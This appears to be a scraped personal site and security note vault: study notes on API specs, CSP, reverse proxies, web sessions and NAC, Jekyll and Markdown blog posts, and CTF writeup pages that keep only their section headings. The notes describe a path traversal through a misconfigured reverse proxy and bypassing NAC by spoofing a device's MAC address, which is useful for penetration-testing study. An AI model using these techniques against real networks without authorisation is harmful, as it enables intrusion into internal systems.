SOAP Simple Object Access Protocol (SOAP) project files: SOAP is an API standard that relies on XML and related schemas. XML-based specifications are governed by XML Schema Definition (XSD) documents. Having a good reference of what a specific API supports can be very beneficial for a penetration tester and will accelerate the testing. The SOAP specification can be accessed at https://www.w3.org/TR/soap. Swagger Swagger (OpenAPI) documentation is a modern framework of API documentation and development that is now the basis of the OpenAPI Specification (OAS). These documents are used in representational state transfer (REST) APIs. REST is a software architectural style designed to guide development of the architecture for web services (including APIs). REST, or “RESTful,” APIs are the most common types of APIs used today. Swagger documents can be extremely beneficial when testing APIs. Additional information about Swagger can be obtained at https://swagger.io. The OAS is available at https://github.com/OAI/OpenAPI-Specification. WSDL Web Services Description Language (WSDL) is an XML-based language that is used to document the functionality of a web service. The WSDL specification can be accessed at https://www.w3.org/TR/wsdl20-primer. GraphQL GraphQL is a query language for APIs. It is also a server-side runtime for executing queries using a type system you define for your data. Additional technical information about GraphQL can be accessed at https://graphql.org/learn. WADL Web Application Description Language (WADL) is an XML-based language for describing web applications. The WADL specification can be obtained from https://www.w3.org/Submission/wadl.

[Vault: Web Security] CSP - Content Security Policy

Thu, 09 Oct 2025 10:02:49 GMT

CSP (Content Security Policy) is a security standard that adds an extra layer of protection against cross-site scripting (XSS), clickjacking, and other code injection attacks. It works by allowing you to define a whitelist of sources that the browser is allowed to load resources from. CSP is implemented by sending a specific HTTP header from the web server.

Including the Content-Security-Policy header
element in the DOM

eg: Header: Content-Security-Policy: default-src 'self'; script-src 'self' ; img-src 'self' https://example.com;

<meta
http-equiv="Content-Security-Policy"
content="default-src ‘self’; img-src https://www.site.com;" />

Directives

CSP policies are built using directives that define the allowed sources for different types of resources. Common CSP directives include:

default-src: Serves as a fallback for other directives when they are not explicitly specified.
script-src: Defines the allowed sources for JavaScript code.
style-src: Defines the allowed sources for CSS stylesheets.
img-src: Defines the allowed sources for images.
connect-src: Defines the allowed sources for making HTTP requests (e.g., via fetch, XMLHttpRequest, or WebSockets).
font-src: Defines the allowed sources for fonts.
media-src: Defines the allowed sources for media files (audio and video).
object-src: Defines the allowed sources for plugins like Flash.
frame-src: Defines the allowed sources for frames and iframes.
base-uri: Defines the allowed URLs that can be used in a <base> element.
form-action: Defines the allowed URLs that can be used as the target of a form submission.
report-uri: Specifies a URL to which the browser should send violation reports when a policy is broken.
sandbox: Specifies restrictions for the resources being applied

Values

none : Prevents loading content from any source.
self : Allows loading content from the same origin (excluding subdomains).
unsafe-inline : Allows the use of inline scripts and styles.
unsafe-eval : Allows the use of “eval()" functions.
<scheme> : Allows loading content over a specific scheme (e.g., “https:’).
<host-source> : Allows loading content from a specific host or domain.
data: : Allows the use of inline data such as base64-encoded images.
blob: : Allows the use of Blob URIs.
CSP can also be configured in "report-only" mode, which allows you to monitor the effects of a policy without enforcing it. This is done using the Content-Security-Policy-Report-Only header.

[Vault: Web Security] Reverse Proxy

Thu, 09 Oct 2025 10:02:49 GMT

A Reverse Proxy server regulates and restricts the internet access to an internal server. The goal is to accept traffic from external parties, approve it, and forward it to the internal servers. This setup is useful for protecting internal web servers containing confidential data from exposing their IP address to external parties. eg: HAproxy, nginx, Apache, squid

Identification

check for error pages(404 pages). see if there are different error pages(different reverse proxy) for different subdomains or different paths.
check http headers. if there are differences in the use of headers, there may be a reverse proxies present.

Exploits

We can do directory traversals on some misconfigure reverse proxies. so if www.website.com/staff/ points to 10.10.100.100/staff/ , if do a path traversal like www.website.com/staff/../ we may be able to access 10.10.100.100/

[Vault: Web Security] Web Sessions

Thu, 09 Oct 2025 10:02:49 GMT

A web session is a sequence of HTTP request and response transactions between a web client and a server. These transactions include pre-authentication tasks, the authentication process, session management, access control, and session finalization. Numerous web applications keep track of information about each user for the duration of a web transaction. Several web applications have the ability to establish variables such as access rights and localization settings. These variables apply to each and every interaction a user has with the web application for the duration of the session.

Web applications can create sessions to keep track of anonymous users after the very first user request. For example, an application can remember the user language preference every time it visits the site or application front end. In addition, a web application uses a session after the user has authenticated. This allows the application to identify the user on any subsequent requests and be able to apply security access controls and increase the usability of the application. In short, web applications can provide session capabilities both before and after authentication.

After an authenticated session has been established, the session ID (or token) is temporarily equivalent to the strongest authentication method used by the application, such as usernames and passwords, one-time passwords, and client-based digital certificates. In order to keep the authenticated state and track user progress, applications provide users with session IDs, or tokens. A token is assigned at session creation time, and it is shared and exchanged by the user and the web application for the duration of the session. The session ID is a name/value pair.

The session ID names used by the most common web application development frameworks can be easily fingerprinted. For instance, you can easily fingerprint PHPSESSID (PHP), JSESSIONID (J2EE), CFID and CFTOKEN (ColdFusion), ASP.NET_SessionId (ASP.NET), and many others. In addition, the session ID name may indicate what framework and programming languages are used by the web application.

It is recommended to change the default session ID name of the web development framework to a generic name, such as id.

The session ID must be long enough to prevent brute-force attacks. Sometimes developers set it to just a few bits, though it must be at least 128 bits (16 bytes).

NOTE TIP It is recommended to change the default session ID name of the web development framework to a generic name, such as id. The session ID must be long enough to prevent brute-force attacks. Sometimes developers set it to just a few bits, but the session ID must be at least 128 bits (16 bytes). Also, the session ID must be unique and unpredictable. It’s a good idea to use a cryptographically secure pseudorandom number generator (PRNG) because the session ID value must provide at least 256 bits of entropy.

There are multiple mechanisms available in HTTP to maintain session state within web applications, including cookies (in the standard HTTP header), the URL parameters and rewriting defined in RFC 3986, and URL arguments on GET requests. In addition, developers use body arguments on POST requests, such as hidden form fields (HTML forms) or proprietary HTTP headers. However, one of the most widely used session ID exchange mechanisms is cookies, which offer advanced capabilities not available in other methods. ![[attachments/Web-Sessions-img-202510091530.png|472x376]] Session management mechanisms based on cookies can make use of two types of cookies: non-persistent (or session) cookies and persistent cookies. If a cookie has a Max-Age or Expires attribute, it is considered a persistent cookie and is stored on a disk by the web browser until the expiration time. Common web applications and clients prioritize the Max-Age attribute over the Expires attribute. Configuring a cookie with the HTTPOnly flag forces the web browser to have this cookie processed only by the server, and any attempt to access the cookie from client-based code or scripts is strictly forbidden. This protects against several type of attacks, including CSRF.

Modern applications typically track users after authentication by using non-persistent cookies. This forces the session information to be deleted from the client if the current web browser instance is closed. This is why it is important to use nonpersistent cookies: so the session ID does not remain on the web client cache for long periods of time.

Session IDs must be carefully validated and verified by an application. Depending on the session management mechanism that is used, the session ID will be received in a GET or POST parameter, in the URL, or in an HTTP header using cookies.

If web applications do not validate and filter out invalid session ID values, they can potentially be used to exploit other web vulnerabilities, such as SQL injection if the session IDs are stored on a relational database or persistent cross-site scripting (XSS) if the session IDs are stored and reflected back afterward by the web application.

Remember to encrypt an entire web session with HTTPS – not only for the authentication process where the user credentials are exchanged but also to ensure that the session ID is exchanged only through an encrypted channel. Using an encrypted communication channel also protects the session against some session fixation attacks, in which the attacker is able to intercept and manipulate the web traffic to inject (or fix) the session ID on the victim’s web browser.

A good resource that provides a lot of information about application authentication is the OWASP Authentication Cheat Sheet, available at https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html.

[Vault: Writeups] apoorvctf2026

Thu, 09 Oct 2025 10:02:49 GMT

![[attachments/index-69dac9fb-5e13-40b0-b286-e4c0f41807f0.png]]

![[attachments/index-ce383e0e-f347-4adc-8a1e-63b69bfc5c42.png]]

[Vault: Vulns & Attacks] NAC bypass

Tue, 01 Jul 2025 11:51:08 GMT

NAC is a technology that is designed to interrogate endpoints before joining a wired or wireless network. It is typically used in conjunction with 802.1X for identity management and enforcement. In short, a network access switch or wireless access point (AP) can be configured to authenticate end users and perform a security posture assessment of the endpoint device to enforce policy. For example, it can check whether you have security software such as antivirus, anti-malware, and personal firewalls before it allows you to join the network. It can also check whether you have a specific version of an operating system (for example, Microsoft Windows, Linux, or macOS) and whether your system has been patched for specific vulnerabilities.

In addition, NAC-enabled devices (switches, wireless APs, and so on) can use several detection techniques to detect the endpoint trying to connect to the network. A NAC-enabled device intercepts DHCP requests from endpoints. A broadcast listener is used to look for network traffic, such as ARP requests and DHCP requests generated by endpoints.

Several NAC solutions use client-based agents to perform endpoint security posture assessments to prevent an endpoint from joining the network until it is evaluated. In addition, some switches can be configured to send an SNMP trap message when a new MAC address is registered with a certain switch port and to trigger the NAC process.

NAC implementations can allow specific nodes such as printers, IP phones, and video conferencing equipment to join the network by using an allow list (or whitelist) of MAC addresses corresponding to such devices. This process is known as MAC authentication (auth) bypass. MAC auth bypass is a feature of NAC. The network administrator can preconfigure or manually change these access levels. For example, a device accessing a specific VLAN (for example, VLAN 88) must be manually predefined for a specific port by an administrator, making deploying a dynamic network policy across multiple ports using port security extremely difficult to maintain.

An attacker could easily spoof an authorized MAC address (in a process called MAC address spoofing ) and bypass a NAC configuration. For example, it is possible to spoof the MAC address of an IP phone and use it to connect to a network. This is because a port for which MAC auth bypass is enabled can be dynamically enabled or disabled based on the MAC address of the device that connects to it.

[Blog] The Ultimate Jekyll Blogging Guide

Wed, 17 Jul 2024 00:00:00 GMT

The Core Components

Jekyll

Jekyll is a static site generator that transforms plain text into static websites and blogs. It's written in ruby and is fast, easy, and open source.

Chirpy

Chirpy is a minimal, responsive, and feature-rich Jekyll theme for technical writing. It has built-in support for light/dark mode, search, SEO and so much more!.

Github pages

GitHub Pages is a free web hosting service provided by GitHub. It allows users to host static websites directly from their GitHub repositories.

Setup Jekyll

Install ruby and other prerequisites.

sudo apt update
sudo apt install ruby-full build-essential zlib1g-dev git

To avoid installing RubyGems packages as the root user:

echo '# Install Ruby Gems to ~/gems' >> ~/.bashrc
echo 'export GEM_HOME="$HOME/gems"' >> ~/.bashrc
echo 'export PATH="$HOME/gems/bin:$PATH"' >> ~/.bashrc
source ~/.bashrc

Install Jekyll and Bundler

gem install jekyll bundler

Confirm installation by using jekyll -v

Checkout jekyll installation docs here.

Use Chirpy

To create a site using the Chirpy Starter.

Sign in to github and go to the Chirpy Starter page.
Click the button Use this template -> Create a new repository, and name the new repository USERNAME.github.io
Clone the repo to your local machine using git clone repo-url.
Install dependencies
```
cd repo-name
bundle
```

Checkout Chirpy docs here.

Build site

To preview the site content by running a local server

bundle exec jekyll s

After a few seconds, the local service will be published at http://127.0.0.1:4000

To build your site in production mode

JEKYLL_ENV=production bundle exec jekyll b

This will output the production site to _site. You can upload this to a server to deploy your site manually.

Deploy site

This site is already configured to automatically deploy to Github pages using Github actions.

Go to your repository on GitHub. Select the Settings tab, then click Pages in the left navigation bar. In the Source section (under Build and deployment), select GitHub Actions from the dropdown menu.
Now all you have to do is push the changes to Github.

git add .
git commit -m "made some changes"
git push

In the Actions tab of your repository, you should see the workflow Build and Deploy running. Once the build is complete and successful, the site will be deployed automatically.

You can now visit the URL provided by GitHub to access your site. (Which is usually USERNAME.github.io)

If you’re on the GitHub Free plan, keep your site repository public.

Usage

Configure your Profile

Update the variables in _config.yml as needed. Make sure to set the following variables correctly:

title
url
avatar
timezone
lang
usernames

Social contact options are displayed at the bottom of the sidebar. You can enable or disable specific contacts in the _data/contact.yml file.

Creating a post

You can write posts using the markdown format. All posts are stored in the _posts folder. Jekyll uses a naming convention for pages and posts.

To create a post, add a file to your _posts directory with the following format: YYYY-MM-DD-title.md.

All blog post files must begin with Front Matter which is typically used to set a layout or other meta data.

Recommended Front Matter for Chirpy

---
title: TITLE
date: YYYY-MM-DD HH:MM:SS +/-TTTT
categories: [TOP_CATEGORIE, SUB_CATEGORIE]
tags: [TAG]     # TAG names should always be lowercase
description: Short summary of the post.
---

Local Linking of Files

https://jekyllrb.com/docs/posts/#including-images-and-resources Image from asset:

... which is shown in the screenshot below:
![[/assets/screenshot.webp|A screenshot]]

You can also specify dimensions
![[/assets/img/sample/mockup.png|Desktop View]]{: w="700" h="400" }

Linking to a file

... you can [[/assets/diagram.pdf|download the PDF]] here.

For additional information, checkout:

If you need some help with markdown, check out the markdown cheat sheet.

Troubleshooting

If auto regeneration is not working, try

jekyll serve --force_polling

If bundle command is not working

Try updating your gems using gem update.

If bundle exec jekyll s is not working

Check output and see if any particular gem is giving problems.
try bundle exec jekyll build
or try bundle exec jekyll serve --no-watch

As a workaround, you could use two terminal windows: one running bundle exec jekyll build --watch to rebuild your site when files change, and another running a simple HTTP server to serve your _site directory: `cd _site python -m http.server 4000`` This last option would allow you to work on your site with live reloading, even if the Jekyll server itself isn't working.

If a specific gem is giving trouble,

Reinstall that gem
```
gem uninstall ffi
gem install ffi
```
If that doesn't work, try reinstalling all your gems:
```
bundle clean --force
bundle install
```
Make sure you are using the correct version and platform of the gem.
1. Check ruby -v and gem list [gem-name] or gem info [gem-name.
2. If it's not same
```
gem uninstall ffi
gem install ffi --platform=ruby
```
or install from local file: gem install --local [pathtofile/gemname] 3. rebuild your bundle: bundle install

Checkout https://jekyllrb.com/docs/troubleshooting/ {: .prompt-tip }

Links

Other jekyll templates

[Blog] Markdown Syntax Support

Wed, 26 Jul 2023 08:00:00 GMT

Basic Syntax

Markdown is a lightweight and easy-to-use syntax for styling your writing.

Headers

When the content of the article is extensive, you can use headers to segment:

# Header 1

## Header 2

## Large Header

### Small Header

Header previews would disrupt the structure of the article, so they are not displayed here.

Bold and Italics

_Italic text_ and **Bold text**, together will be **_Bold Italic text_**

Preview:

Italic text and Bold text, together will be Bold Italic text

Links

Text link [Link Name](http://link-url)

Preview:

Text link Link Name

Inline Code

This is an `inline code`

Preview:

This is an inline code

Code Blocks

```js
// calculate fibonacci
function fibonacci(n) {
  if (n <= 1) return 1
  const result = fibonacci(n - 1) + fibonacci(n - 2) // [\!code --]
  return fibonacci(n - 1) + fibonacci(n - 2) // [\!code ++]
}
```

Preview:

// calculate fibonacci
function fibonacci(n) {
  if (n <= 1) return 1
  const result = fibonacci(n - 1) + fibonacci(n - 2) // [!code --]
  return fibonacci(n - 1) + fibonacci(n - 2) // [!code ++]
}

Currently using shiki as the code highlighting plugin. For supported languages, refer to Shiki: Languages.

Inline Formula

This is an inline formula $e^{i\pi} + 1 = 0$

Preview:

This is an inline formula $e^{i\pi} + 1 = 0$

Formula Blocks

$$
\hat{f}(\xi) = \int_{-\infty}^{\infty} f(x) e^{-2\pi i x \xi} \, dx
$$

Preview:

$$ \hat{f}(\xi) = \int_{-\infty}^{\infty} f(x) e^{-2\pi i x \xi} , dx $$

Currently using KaTeX as the math formula plugin. For supported syntax, refer to KaTeX Supported Functions.

Images

![Nahil](https://avatars.githubusercontent.com/u/88521572)

Preview:

Strikethrough

~~Strikethrough~~

Preview:

~~Strikethrough~~

Lists

Regular unordered list

- 1
- 2
- 3

Preview:

Regular ordered list

1. GPT-4
2. Claude Opus
3. LLaMa

Preview:

GPT-4
Claude Opus
LLaMa

You can continue to nest syntax within lists.

Blockquotes

> Gunshot, thunder, sword rise. A scene of flowers and blood.

Preview:

Gunshot, thunder, sword rise. A scene of flowers and blood.

You can continue to nest syntax within blockquotes.

Line Breaks

Markdown needs a blank line to separate paragraphs.

If you don't leave a blank line
it will be in one paragraph

First paragraph

Second paragraph

Preview:

If you don't leave a blank line it will be in one paragraph

First paragraph

Second paragraph

Separators

If you have the habit of writing separators, you can start a new line and enter three dashes --- or asterisks ***. Leave a blank line before and after when there are paragraphs:

---

Preview:

Advanced Techniques

Inline HTML Elements

Currently, only some inline HTML elements are supported, including <kdb> <b> <i> <em> <sup> <sub> <br>, such as

Key Display

Use <kbd>Ctrl</kbd> + <kbd>Alt</kbd> + <kbd>Del</kbd> to reboot the computer

Preview:

Use Ctrl + Alt + Del to reboot the computer

Bold Italics

<b> Markdown also applies here, such as _bold_ </b>

Preview:

Markdown also applies here, such as bold

Other HTML Writing

Foldable Blocks

<details><summary>Click to expand</summary>It is hidden</details>

Preview:

Tables

| Header1  | Header2  |
| -------- | -------- |
| Content1 | Content2 |

Preview:

| Header1 | Header2 | | -------- | -------- | | Content1 | Content2 |

Footnotes

Use [^footnote] to add a footnote at the point of reference.

Then, at the end of the document, add the content of the footnote (it will be rendered at the end of the article by default).

[^footnote]: Here is the content of the footnote

Preview:

Use [^footnote] to add a footnote at the point of reference.

Then, at the end of the document, add the content of the footnote (it will be rendered at the end of the article by default).

[^footnote]: Here is the content of the footnote

To-Do Lists

- [ ] Incomplete task
- [x] Completed task

Preview:

[ ] Incomplete task
[x] Completed task

Symbol Escaping

If you need to use markdown symbols like _ # * in your description but don't want them to be escaped, you can add a backslash before these symbols, such as \_ \# \* to avoid it.

\_Don't want the text here to be italic\_

\*\*Don't want the text here to be bold\*\*

Preview:

_Don't want the text here to be italic_

**Don't want the text here to be bold**

Embedding Astro Components

See User Components and Advanced Components for details.

0xnhl

[Vault: Linux] BTRFS

Core Features

Important Commands Reference

1. File System Creation & Info

2. Subvolumes

3. Snapshots

4. Device Management

5. Maintenance & Repair

DOCS

[Vault: Cryptography] Hashing

Hash Functions

MD5

Hash collisions

Next-generation hashing

SHA-256

[Vault: Root] Cybersecurity

Cybersecurity (or security)

Key terms and concepts

Core skills for cybersecurity professionals

Security Risks

Security Frameworks

Threats

Vulns and attacks

CISSP Domains

[Vault: Writeups / apoorvctf2026 / osint] journey

Description

[Vault: Writeups / apoorvctf2026 / hw] Resonance Lock The Harmonic Multiplier

Challenge Summary

Initial Triage and Reality Check

Protocol Notes That Matter

Timing Math

Exploitation Strategy

Solver Script

Recovered Flag

Why This Works

Pitfalls / Dead Ends Encountered

[Vault: Writeups / apoorvctf2026 / hw] Dead Reckoning

Challenge

Challenge Description

1) Fast Triage

File type and strings

2) Locate Important Offsets

3) Parse Fragmented Job Packets

4) Recover Obfuscation Key

5) Decrypt Result = CNC G-code

6) Reconstruct the Engraving Geometry

7) Final Flag

Repro Script (Single-File)

Dead Ends / Notes

[Vault: Writeups / apoorvctf2026 / forensics] Author on the Run

ApoorvCTF Forensics Writeup - Keyboard Audio Leakage

Challenge summary

Objective

Initial triage

Attack plan

Solver script (full code used)

Running it

Interpreting the decode

Notes on robustness

[Vault: Writeups / apoorvctf2026 / forensics] Routine Checks

Routine System Checks (Forensics) - Detailed Writeup

Expected flag format: apoorvctf{...}

1) Initial triage

2) Locate the suspicious payload

3) Reconstruct the hidden JPEG

4) Decode the obvious visual payload (decoy)

5) Check for second-layer hiding inside the JPEG

6) Recover final flag

Why this solve path is correct

Minimal reproducible command flow

[Vault: Writeups / apoorvctf2026 / cryptography] The Riddler's Cipher Delight

Challenge

The Vulnerability: Low Public Exponent Attack

The Solution

[Vault: Writeups / apoorvctf2026 / ai] Mirrorfall Writeup

Project Mirrorfall - Detailed Writeup

Challenge

Step 0 - Read the prompt

Step 1 - Locate the public archive + target PDF

Expected flag format: `apoorvctf{...}`

A) OOB stack read leak in `calibrate_rings`

B) Stack overflow in `inject_plasma`

Flag gate logic (`did_i_pass`)